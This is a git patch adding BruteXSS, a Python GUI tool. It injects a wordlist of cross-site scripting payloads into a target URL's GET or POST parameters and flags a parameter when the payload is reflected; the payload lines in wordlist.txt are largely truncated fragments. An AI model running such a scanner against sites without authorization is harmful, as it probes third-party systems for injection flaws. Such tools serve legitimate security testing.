From b57cbb0affce7007e015c5ce48248c6a830e1079 Mon Sep 17 00:00:00 2001 From: Rajesh Majumdar Date: Mon, 27 Feb 2017 01:13:58 +0530 Subject: [PATCH] Added some required files. --- brutexss.py | 460 +++++++++++++++++++++++++++++++++++++++++++++ checkurl.py | 25 +++ checkurl.pyc | Bin 0 -> 893 bytes icon.ico | Bin 0 -> 1150 bytes parameters.py | 21 +++ parameters.pyc | Bin 0 -> 713 bytes wordlist.txt | 25 +++ wordlistimport.py | 10 + wordlistimport.pyc | Bin 0 -> 492 bytes 9 files changed, 541 insertions(+) create mode 100644 brutexss.py create mode 100644 checkurl.py create mode 100644 checkurl.pyc create mode 100644 icon.ico create mode 100644 parameters.py create mode 100644 parameters.pyc create mode 100644 wordlist.txt create mode 100644 wordlistimport.py create mode 100644 wordlistimport.pyc diff --git a/brutexss.py b/brutexss.py new file mode 100644 index 0000000..e5cf19f --- /dev/null +++ b/brutexss.py @@ -0,0 +1,460 @@ +#! /usr/bin/env python + +__author__ = 'Rajesh Majumdar' + +try: + from tkinter import * + import tkinter.scrolledtext as sctx +except: + from Tkinter import * + import ScrolledText as sctx + + +try: + import ttk +except ImportError: + from tkinter.ttk import ttk + +import sys +import os +import urlparse +from string import whitespace +import urllib +import httplib +import thread +import time +import tkMessageBox +import threading +from time import gmtime, strftime + +from wordlistimport import importword +from checkurl import checkurl +from parameters import checkparams, getquery +import mechanize + +top = Tk() + +_bgcolor = '#d9d9d9' # X11 color: 'gray85' +_fgcolor = '#000000' # X11 color: 'black' +_compcolor = '#d9d9d9' # X11 color: 'gray85' +_ana1color = '#d9d9d9' # X11 color: 'gray85' +_ana2color = '#d9d9d9' # X11 color: 'gray85' +style = ttk.Style() +if sys.platform == "win32": + style.theme_use('winnative') +style.configure('.',background=_bgcolor) +style.configure('.',foreground=_fgcolor) +style.configure('.',font="TkDefaultFont") +style.map('.',background= + [('selected', _compcolor), ('active',_ana2color)]) + +top.geometry("598x537+442+151") +top.title("BruteXSS - XSS Bruteforcing Tool") +top.configure(background="#d9d9d9") +top.configure(highlightbackground="#d9d9d9") +top.configure(highlightcolor="black") +if os.name == "nt": + top.iconbitmap('icon.ico') +else: + pass + + +def getmethod(vlink): + #print "Program reached here" + path = "wordlist.txt" + site = vlink + if 'https://' in vlink: + pass + elif 'http://' in vlink: + pass + else: + #print "Program is there" + site = 'http://'+vlink + finalurl= urlparse.urlparse(site) + urldata = urlparse.parse_qsl(finalurl.query) + domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) + domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") + #print (Style.DIM+Fore.WHITE+"[+] Checking if "+domain+" is available..."+Style.RESET_ALL) + #connection = httplib.HTTPConnection(domain) + #connection.connect() + #print("[+] "+Fore.GREEN+domain+" is available! Good!"+Style.RESET_ALL) + url = site + paraname = [] + paravalue = [] + payloads = [] + importword(path,payloads) + #print payloads + lop = str(len(payloads)) + output.insert(END, "\n[+] "+lop+" payloads loaded.") + output.insert(END, "\n[+] Bruteforce start:") + o = urlparse.urlparse(site) + parameters = urlparse.parse_qs(o.query,keep_blank_values=True) + path = urlparse.urlparse(site).scheme+"://"+urlparse.urlparse(site).netloc+urlparse.urlparse(site).path + for para in parameters: + for i in parameters[para]: + paraname.append(para) + paravalue.append(i) + total = 0 + c = 0 + fpar = [] + fresult = [] + prgs = 0 + for pn, pv in zip(paraname,paravalue): #Scanning the parameter. + output.insert(END, "\n[+] Testing '"+pn+"' parameter...") + fpar.append(str(pn)) + for x in payloads: # + validate = x.translate(None, whitespace) + if validate == "": + + prgs = prgs + 1 + else: + output.insert(END, "\n[+] %i / %s payloads injected..."% (prgs,len(payloads))) + prgs = prgs + 1 + enc = urllib.quote_plus(x) + data = path+"?"+pn+"="+pv+enc + page = urllib.urlopen(data) + sourcecode = page.read() + if x in sourcecode: + output.insert(END, "\n[!]"+" XSS Vulnerability Found! \n[!]"+" Parameter:\t"+pn+"\n[!] Payload:\t"+x) + fresult.append(" Vulnerable ") + c = 1 + total = total+1 + prgs = prgs + 1 + break + else: + c = 0 + if c == 0: + output.insert(END, "\n[+] '%s' parameter not vulnerable.")%pn + fresult.append("Not Vulnerable") + prgs = prgs + 1 + pass + prgs = 0 + complete(fpar,fresult,total,domain) +def complete(p, r, c, d): + output.insert(END, "\n[+] Bruteforcing Completed.") + progress.stop() + if c == 0: + output.insert(END, "\n[+] Given parameters are not vulnerable.") + elif c == 1: + output.insert(END, "\n[+] %s Parameter is vulnerable to XSS."%c) + else: + output.insert(END, "\n[+] %s Parameters are vulnerable to XSS."%c) + +def postmethod(vlink): + br = mechanize.Browser() + br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')] + br.set_handle_robots(False) + br.set_handle_refresh(False) + site = vlink + if 'https://' in site: + pass + elif 'http://' in site: + pass + else: + site = 'http://'+site + finalurl = urlparse.urlparse(site) + urldata = urlparse.parse_qsl(finalurl.query) + domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) + domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") + path = urlparse.urlparse(site).scheme+"://"+urlparse.urlparse(site).netloc+urlparse.urlparse(site).path + url = site + with open ('postdata.txt', 'r') as f: + param = f.read() + wrdlist = wordlist.get() + payloads = [] + payloads = [] + importword(wrdlist,payloads) + lop = str(len(payloads)) + output.insert(END, "[+] "+lop+" Payloads loaded...") + output.insert(END, "[+] Bruteforce start:") + params = "http://www.site.com/?"+param + finalurl = urlparse.urlparse(params) + urldata = urlparse.parse_qsl(finalurl.query) + o = urlparse.urlparse(params) + parameters = urlparse.parse_qs(o.query,keep_blank_values=True) + paraname = [] + paravalue = [] + for para in parameters: #Arranging parameters and values. + for i in parameters[para]: + paraname.append(para) + paravalue.append(i) + fpar = [] + fresult = [] + total = 0 + prgs = 0 + pname1 = [] #parameter name + payload1 = [] + for pn, pv in zip(paraname,paravalue): #Scanning the parameter. + output.insert(END, "[+] Testing '"+pn+"' parameter...") + fpar.append(str(pn)) + for i in payloads: + validate = i.translate(None, whitespace) + if validate == "": + progress = progress + 1 + else: + progress = progress + 1 + output.insert(END, "\n[+] %i / %s payloads injected..."% (prgs,len(payloads))) + pname1.append(pn) + payload1.append(str(i)) + freakym0nk = 0 + for m in range(len(paraname)): + d = paraname[freakym0nk] + d1 = paravalue[freakym0nk] + tst= "".join(pname1) + tst1 = "".join(d) + if pn in d: + freakym0nk = freakym0nk + 1 + else: + freakym0nk = freakym0nk +1 + pname1.append(str(d)) + payload1.append(str(d1)) + data = urllib.urlencode(dict(zip(pname1,payload1))) + r = br.open(path, data) + sourcecode = r.read() + pname1 = [] + payload1 = [] + if i in sourcecode: + output.insert(END, "\n[!] "+" XSS Vulnerability Found! \n[!] "+" Parameter:\t%s\n[!] "+" Payload:\t%s")%(pn,i) + fresult.append(" Vulnerable ") + c = 1 + total = total+1 + prgs = prgs + 1 + break + else: + c = 0 + if c == 0: + output.insert(END, "\n[+]"+" '%s' parameter not vulnerable.")%pn + fresult.append("Not Vulnerable") + prgs = prgs + 1 + pass + prgs = 0 + complete(fpar,fresult,total,domain) +def execute(): + time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) + output.insert(END, "\nBruteXSS started on "+time) + status = "0" + link = url.get() #Working for URL + postchecked = postmethodchecked.get() + getchecked = getmethodchecked.get() + #print link #For Testing + domainame = urlparse.urlparse(link) + domainname = domainame.hostname + + #Checking for URL + isavailable = checkurl(link, status) + if isavailable == "1": + output.insert(END, "\n\n[+] Site '"+domainname+"' is available, Good!") + else: + output.insert(END, "\n[!] Oops! URL not available") + + #Checking for params + param = checkparams(link) + #print param #For testing + if param == "1": + print("\nParam is there.") + elif param == "0": + output.insert(END, "\n[!] Oops! can't find any parameters!") + output.insert(END, "\nPlease try again.") + top.mainloop() + #else: + #output.insert(END, "\n Something went wrong.") + + #POST Data + datafile = open("postdata.txt","w") + content = postdata.get("1.0", "end-1c") + datafile.write(content) + datafile.close() + + + #Working for path + #print path #For testing + #importword(path, payloads) + #lop = str(len(payloads)) + #output.insert(END, "\n[+] Loading payloads....") + #output.insert(END, "\n[+] Loaded "+lop+" payloads.") + #progress.start(1) + + + #The bruteforce part + if postchecked == 1: + postmethod(link) + elif getchecked == 1: + getmethod(link) + else: + output.insert(END, "\n[+] Something went wrong!") + top.mainloop() + +def process(): + progress.start(1) + bckprocess = threading.Thread(target=execute) + bckprocess.start() + +#URL Field +url = Entry(top) +url.place(relx=0.22, rely=0.04, relheight=0.04, relwidth=0.49) +url.configure(background="white") +url.configure(disabledforeground="#a3a3a3") +url.configure(font="TkFixedFont") +url.configure(foreground="#000000") +url.configure(highlightbackground="#d9d9d9") +url.configure(highlightcolor="black") +url.configure(insertbackground="black") +url.configure(selectbackground="#c4c4c4") +url.configure(selectforeground="black") +url.insert(END, "https://") + +#BruteXSS Button +brutexss = Button(top, command=process) #Remove "" +brutexss.place(relx=0.75, rely=0.04, height=25, width=76) +brutexss.configure(activebackground="#d9d9d9") +brutexss.configure(activeforeground="#000000") +brutexss.configure(background="#d9d9d9") +brutexss.configure(disabledforeground="#a3a3a3") +brutexss.configure(foreground="#000000") +brutexss.configure(highlightbackground="#d9d9d9") +brutexss.configure(highlightcolor="black") +brutexss.configure(pady="0") +brutexss.configure(text='''BruteXSS''') + +#Label 1 +TLabel1 = ttk.Label(top) +TLabel1.place(relx=0.1, rely=0.04, height=19, width=66) +TLabel1.configure(background="#d9d9d9") +TLabel1.configure(foreground="#000000") +TLabel1.configure(relief=FLAT) +TLabel1.configure(text='''Enter URL''') + +#Progress Bar +progress = ttk.Progressbar(top, orient = HORIZONTAL, length=395, mode="indeterminate") +progress.place(relx=0.07, rely=0.17, relwidth=0.85 + , relheight=0.0, height=22) + +#Label 2 +TLabel2 = ttk.Label(top) +TLabel2.place(relx=0.18, rely=0.95, height=19, width=154) +TLabel2.configure(background="#d9d9d9") +TLabel2.configure(foreground="#000000") +TLabel2.configure(relief=FLAT) +TLabel2.configure(text='''CLI Developer : Shawar Khan''') + +#Label 3 +TLabel3 = ttk.Label(top) +TLabel3.place(relx=0.48, rely=0.95, height=19, width=180) +TLabel3.configure(background="#d9d9d9") +TLabel3.configure(foreground="#000000") +TLabel3.configure(relief=FLAT) +TLabel3.configure(text='''GUI Developer : Rajesh Majumdar''') + +#MenuBar +menubar = Menu(top,bg=_bgcolor,fg=_fgcolor) +top.configure(menu = menubar) + +#Label 4 +TLabel4 = ttk.Label(top) +TLabel4.place(relx=0.07, rely=0.3, height=19, width=90) +TLabel4.configure(background="#d9d9d9") +TLabel4.configure(foreground="#000000") +TLabel4.configure(relief=FLAT) +TLabel4.configure(text='''Enter POST Data''') + +#Label 5 +TLabel5 = ttk.Label(top) +TLabel5.place(relx=0.07, rely=0.54, height=19, width=42) +TLabel5.configure(background="#d9d9d9") +TLabel5.configure(foreground="#000000") +TLabel5.configure(relief=FLAT) +TLabel5.configure(text='''Output''') + +#Label 6 +TLabel6 = ttk.Label(top) +TLabel6.place(relx=0.07, rely=0.24, height=19, width=91) +TLabel6.configure(background="#d9d9d9") +TLabel6.configure(foreground="#000000") +TLabel6.configure(relief=FLAT) +TLabel6.configure(text='''Custom wordlist''') + +#Wordlist Path +wordlist = Entry(top) #WORDLIST HERE +wordlist.place(relx=0.25, rely=0.24, relheight=0.04, relwidth=0.65) +wordlist.configure(background="white") +wordlist.configure(disabledforeground="#a3a3a3") +wordlist.configure(font="TkFixedFont") +wordlist.configure(foreground="#000000") +wordlist.configure(highlightbackground="#d9d9d9") +wordlist.configure(highlightcolor="black") +wordlist.configure(insertbackground="black") +wordlist.configure(selectbackground="#c4c4c4") +wordlist.configure(selectforeground="black") +wordlist.insert(END, "wordlist.txt") + +#POST Data Box +postdata = sctx.ScrolledText(top) +postdata.place(relx=0.07, rely=0.34, relheight=0.21 + , relwidth=0.84) +postdata.configure(background="white") +postdata.configure(font="TkTextFont") +postdata.configure(foreground="black") +postdata.configure(highlightbackground="#d9d9d9") +postdata.configure(highlightcolor="black") +postdata.configure(insertbackground="black") +postdata.configure(insertborderwidth="3") +postdata.configure(selectbackground="#c4c4c4") +postdata.configure(selectforeground="black") +postdata.configure(width=10) +postdata.configure(wrap=NONE) + +#Output Box +output = sctx.ScrolledText(top) +output.place(relx=0.07, rely=0.58, relheight=0.36 + , relwidth=0.84) +output.configure(background="white") +output.configure(font="TkTextFont") +output.configure(foreground="black") +output.configure(highlightbackground="#d9d9d9") +output.configure(highlightcolor="black") +output.configure(insertbackground="black") +output.configure(insertborderwidth="3") +output.configure(selectbackground="#c4c4c4") +output.configure(selectforeground="black") +output.configure(width=10) +output.configure(wrap=NONE) +output.see(END) + +#GET Method Checkbox +getmethodchecked = IntVar() +getmethodchecked.set(1) +getmethodcheck = Checkbutton(top, variable=getmethodchecked) +getmethodcheck.place(relx=0.25, rely=0.11, relwidth=0.15 + , relheight=0.0, height=21) +getmethodcheck.configure(activebackground="#d9d9d9") +getmethodcheck.configure(activeforeground="#000000") +getmethodcheck.configure(background="#d9d9d9") +getmethodcheck.configure(disabledforeground="#a3a3a3") +getmethodcheck.configure(foreground="#000000") +getmethodcheck.configure(highlightbackground="#d9d9d9") +getmethodcheck.configure(highlightcolor="black") +getmethodcheck.configure(justify=LEFT) +getmethodcheck.configure(text='''GET Method''') + +#POST Method Check +postmethodchecked = IntVar() +postmethodcheck = Checkbutton(top, variable=postmethodchecked) +postmethodcheck.place(relx=0.52, rely=0.11, relwidth=0.16 + , relheight=0.0, height=21) +postmethodcheck.configure(activebackground="#d9d9d9") +postmethodcheck.configure(activeforeground="#000000") +postmethodcheck.configure(background="#d9d9d9") +postmethodcheck.configure(disabledforeground="#a3a3a3") +postmethodcheck.configure(foreground="#000000") +postmethodcheck.configure(highlightbackground="#d9d9d9") +postmethodcheck.configure(highlightcolor="black") +postmethodcheck.configure(justify=LEFT) +postmethodcheck.configure(text='''POST Method''') + +def start(): + start = Tk() + start.geometry("1x1+"+str(start.winfo_screenwidth()/2)+"+"+str(start.winfo_screenheight()/2)) + tkMessageBox.showinfo(title="Disclaimer", message="This tool is a free software.\nIt means you are not allowed to modify the source code, or any files of this tool, or not allowed to sell its copy.\nYou can use this tool in your tool but you are not allowed to modify anything.") + top.mainloop() + +start() diff --git a/checkurl.py b/checkurl.py new file mode 100644 index 0000000..666c632 --- /dev/null +++ b/checkurl.py @@ -0,0 +1,25 @@ +#! /usr/bin/env python +__author__ = 'Rajesh Majumdar' + +import httplib +import socket +import urlparse + +def checkurl(url, status): + if "http://" in url: + pass + elif "https://" in url: + pass + else: + url = "http://"+url + finalurl = urlparse.urlparse(url) + urldata = urlparse.parse_qsl(finalurl.query) + domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) + domain = domain0.replace("https://","").replace("http://","").replace("www.","").replace("/","") + try: + request = httplib.HTTPConnection(domain) + request.connect() + status = "1" + except (httplib.HTTPResponse): + status = "0" + return status diff --git a/checkurl.pyc b/checkurl.pyc new file mode 100644 index 0000000000000000000000000000000000000000..3b8fa3d97d074bb6340beaa63e3e7e1337564244 GIT binary patch literal 893 zcmb7C&59F25U!p{CfOkx5kwS`1ur=z>qTJ^5%=Q7Wl2^HArRV`UNV!(bhf*P5X_v` zC-Ot3vHzfTitz5x3>h=xg7!gq8aZO9qK{)9s1J<%#6 z)2H$Y*J;e>RK`v8aZTiia^l#HpgQm-P6m_*-s7p{&@Fb}kf;G#lzV1rn{JQ^j5hw@ z=pWo^aNVZe3vzABBibVqcL79{cTkf=+NE01=kh7FIHyain9L6nLZn9=DFsdU0+Wc* z*}3Irm(FcYMBGsvbiF1#R(7LHs|H-BVOse5)=5`c&*v&DWdTyY0`^oQ#s^ZpmRWh? z^AFg&jRH;U2FM_<>@m=%)A@zbImp=gds8_zolNE!S+YXO;b!Nry0du<{uGIx2w8$y z^u(PAMhx722_7_)h3LMJQb#+);L1ofBFfAV^>)@fC!xBT1t L=Z}IOSoMP6-)y-0 literal 0 HcmV?d00001 diff --git a/icon.ico b/icon.ico new file mode 100644 index 0000000000000000000000000000000000000000..fcf897cb4d5b6722f7479e7e133fc54fd07ff691 GIT binary patch literal 1150 zcmb7ESx-|@5WXh<0G@o)@E}A1HDJI6F}Of*BZMeQ1vJPaO9%o=qQM1)5LsPtsi??O zDJ}b=B1EJJBFLgpL?}@!OHl+V!~$(U=bqaV!<*C0IWylmGxMEu=9c4D(9gnxqtTK( zy^`ZraU8dflpsO`oFPclUTA^s|A`39b7^%3yM4+m!1sa_Z z<8up8Pt9UN2Wb8nnEqSR&$OC!iuY#px5(k z1ewv!F~6fzNoOu);54P?d7I;To5y%bzFh?6Cl#|778l_cdIgd3S@1X5P z;awk^dj|1+S_}2B87R6xqn@z0ANnAvdWC~W&m#K#4fs>+h*pQJM-|w0C=3NMIl6|& z(9$S@IQtp~#-{P{s|F9U6Y*9dLzik4Po7HQ;t_&71+}z3#dwH9uffLN9qqmS%pYpI zkD=abBxT&g^;-|2>XAd$na|dm+TX+4ZV!TEGMJxqQ-U4)B4O|7hKQ&$kXAlJDV;-{ zFNg2(6YvWNM2@74&Za<7MJ+h*3vmgzc!)_&-5ad6KLWe0A{+_4h?|cq@K|1tkk~YY$7dq9q=9ku z4!8hYCtp}O_@Jq!+Z@j3<3X2TvqgkW&H=EZT-LN_y`wMbu_fQZo+G#TX3K zyQbd%Lg(7D=M*+>_s7<~!DI(9b=n<-ZEhjVUTx!rh`7|Hx_s~RqBnh0AC*Jcxj&3? z;PcpR^JDqe+WTNT-EkD1<&~m?#hB|dhvg7@dT>}xJyL_pS_QmB@yNO>B`tzDx7@sy PI16=oVEO;S|N4Icl-4Wi literal 0 HcmV?d00001 diff --git a/parameters.py b/parameters.py new file mode 100644 index 0000000..ed7fb2a --- /dev/null +++ b/parameters.py @@ -0,0 +1,21 @@ +#! /usr/bin/env python +__author__ = 'Rajesh Majumdar' + +from urlparse import urlparse + +def checkparams(url): + params = urlparse(url) + param = params.query + #print param #For testing + if "=" in param: + pstatus = "1" + else: + pstatus = "0" + return pstatus + +def getquery(url): + #This function would return the query + query = urlparse.query(url) + squery = query.split("=") + aquery = squery[1] + return aquery \ No newline at end of file diff --git a/parameters.pyc b/parameters.pyc new file mode 100644 index 0000000000000000000000000000000000000000..645cf8d797ed829abbe809dca917740d3ecf382e GIT binary patch literal 713 zcmb7>&q~8U5XNUWZM3zey?PT*K|~ZhiHhjiA}K;Cg%Fa({?b11YYJ^L;`g%9Kd z=r1J(C+b5L<(j67W{UcXR36X^7BuA* zNdn5N)Qv(u)q=$7*tp@|Z8|Pyd1^W^!0X>FCDLvN&OZVolkw?BBUhZ_L1G64esoGY%=c#*S7Gc*X<7EknzU4qs7wiU|Tjc z*`#bMo;0|NYN(p#2-Sab_8R1%{R1!L?1g52knjEwGe9S1;t@;4-$EL*7XsrJ(~%e4 znCZ&}nMaHe_O$c_%bQX1e|#`rPPdUeE|6}ima3~x>2V#EBuNWDoZBQRhpV9$HzB{q ZZsaasb3U8r#nfE#&vncb>b9=czW_EmhZ6t* literal 0 HcmV?d00001 diff --git a/wordlist.txt b/wordlist.txt new file mode 100644 index 0000000..af1d2d0 --- /dev/null +++ b/wordlist.txt @@ -0,0 +1,25 @@ +"> +"> +"> +"> +">

Clickme

+">Clickme +">Clickme +">click +">